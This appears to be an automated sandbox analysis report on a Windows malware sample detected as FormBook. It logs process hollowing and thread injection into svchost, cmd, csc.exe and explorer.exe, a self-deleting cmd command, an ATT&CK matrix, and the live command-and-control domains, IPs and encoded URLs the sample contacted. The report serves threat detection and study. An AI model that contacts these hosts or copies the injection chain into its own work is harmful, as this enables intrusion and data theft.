Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EC073 mov eax, dword ptr fs:[00000030h]	5_2_055EC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646050 mov eax, dword ptr fs:[00000030h]	5_2_05646050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566705E mov ebx, dword ptr fs:[00000030h]	5_2_0566705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566705E mov eax, dword ptr fs:[00000030h]	5_2_0566705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]	5_2_055DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]	5_2_055DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]	5_2_055DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]	5_2_055DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05656030 mov eax, dword ptr fs:[00000030h]	5_2_05656030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]	5_2_0568903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]	5_2_0568903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]	5_2_0568903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]	5_2_0568903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05644000 mov ecx, dword ptr fs:[00000030h]	5_2_05644000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BA020 mov eax, dword ptr fs:[00000030h]	5_2_055BA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BC020 mov eax, dword ptr fs:[00000030h]	5_2_055BC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056460E0 mov eax, dword ptr fs:[00000030h]	5_2_056460E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E90DB mov eax, dword ptr fs:[00000030h]	5_2_055E90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056020F0 mov ecx, dword ptr fs:[00000030h]	5_2_056020F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563D0C0 mov eax, dword ptr fs:[00000030h]	5_2_0563D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563D0C0 mov eax, dword ptr fs:[00000030h]	5_2_0563D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BC0F0 mov eax, dword ptr fs:[00000030h]	5_2_055BC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056950D9 mov eax, dword ptr fs:[00000030h]	5_2_056950D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C80E9 mov eax, dword ptr fs:[00000030h]	5_2_055C80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BA0E3 mov ecx, dword ptr fs:[00000030h]	5_2_055BA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056420DE mov eax, dword ptr fs:[00000030h]	5_2_056420DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E50E4 mov eax, dword ptr fs:[00000030h]	5_2_055E50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E50E4 mov ecx, dword ptr fs:[00000030h]	5_2_055E50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F909C mov eax, dword ptr fs:[00000030h]	5_2_055F909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C5096 mov eax, dword ptr fs:[00000030h]	5_2_055C5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056580A8 mov eax, dword ptr fs:[00000030h]	5_2_056580A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055ED090 mov eax, dword ptr fs:[00000030h]	5_2_055ED090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055ED090 mov eax, dword ptr fs:[00000030h]	5_2_055ED090

Source: C:\Windows\SysWOW64\wlanext.exe

Code function: 7_2_00FDE653 GetProcessHeap,GetLastError,HeapFree,GetLastError,

7_2_00FDE653

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FAAB64C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF67FAAB64C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00FE0063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00FE0063
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00FDFD20 SetUnhandledExceptionFilter,	7_2_00FDFD20

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 103.235.47.188 80

Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread register set: target process: 4004			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 4004			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section unmapped: C:\Windows\System32\cmd.exe base address: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: FD0000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\System32\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\System32\cmd.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4C01008	Jump to behavior

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior

Source: explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000006.00000000.2134613895.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.4561547530.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2133111600.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000003.3075903559.00000000098C4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076035340.00000000098E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: GetLocaleInfoEx,		0_2_00007FF67FAD8FB0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: GetLocaleInfoEx,		0_2_00007FF67FAD9080

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe

Code function: 0_2_00007FF67FA50030 GetSystemTimeAsFileTime,

0_2_00007FF67FA50030

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\wlanext.exe

Code function: 7_2_00FDF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,

7_2_00FDF160

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	3 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	812 Process Injection	1 Access Token Manipulation	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	812 Process Injection	Security Account Manager	3 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	213 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Iifpj4i2kC.exe	55%	ReversingLabs	Win64.Trojan.XWorm
Iifpj4i2kC.exe	71%	Virustotal		Browse

Source	Detection	Scanner	Link
www.onsen1508.com	1%	Virustotal	Browse
barnesassetrecovery.store	1%	Virustotal	Browse
www.wshifen.com	0%	Virustotal	Browse
partymaxclubmen36.click	3%	Virustotal	Browse
pixie.porkbun.com	0%	Virustotal	Browse
www.lynxpire.com	2%	Virustotal	Browse
www.chiri.lat	0%	Virustotal	Browse
www.partymaxclubmen36.click	0%	Virustotal	Browse
www.rslotrank.win	0%	Virustotal	Browse
www.teplo-invest.com	0%	Virustotal	Browse
www.zruypj169g.top	2%	Virustotal	Browse
www.barnesassetrecovery.store	2%	Virustotal	Browse
www.tdshomesolution.com	0%	Virustotal	Browse
www.a1b5v.xyz	2%	Virustotal	Browse
www.33mgbet.com	0%	Virustotal	Browse
www.zbbnp.xyz	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
http://www.rslotrank.win	0%	Virustotal		Browse
http://www.a1b5v.xyz	2%	Virustotal		Browse
http://www.33mgbet.com/md02/	1%	Virustotal		Browse
http://www.33mgbet.com	0%	Virustotal		Browse
http://www.upcyclecharms.com/md02/www.hecxion.xyz	7%	Virustotal		Browse
http://www.mamasprinkleofjoy.com	0%	Virustotal		Browse
http://www.hecxion.xyz/md02/www.mamasprinkleofjoy.com	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cbmsource-web-5091.rejcdn.com	104.18.14.105	true	true		unknown
www.onsen1508.com	118.27.100.151	true	true	1%, Virustotal, Browse	unknown
barnesassetrecovery.store	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.wshifen.com	103.235.47.188	true	true	0%, Virustotal, Browse	unknown
partymaxclubmen36.click	172.96.187.89	true	true	3%, Virustotal, Browse	unknown
pixie.porkbun.com	44.227.65.245	true	true	0%, Virustotal, Browse	unknown
www.lynxpire.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.zbbnp.xyz	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.chiri.lat	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.a1b5v.xyz	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.rslotrank.win	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.zruypj169g.top	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.barnesassetrecovery.store	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.partymaxclubmen36.click	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.teplo-invest.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.33mgbet.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.tdshomesolution.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.zruypj169g.top/md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA==	true	unknown
http://www.33mgbet.com/md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn	true	unknown
www.upcyclecharms.com/md02/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.teplo-invest.comReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.mamasprinkleofjoy.comReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rslotrank.win	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	Iifpj4i2kC.exe	false	URL Reputation: safe URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.a1b5v.xyz	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
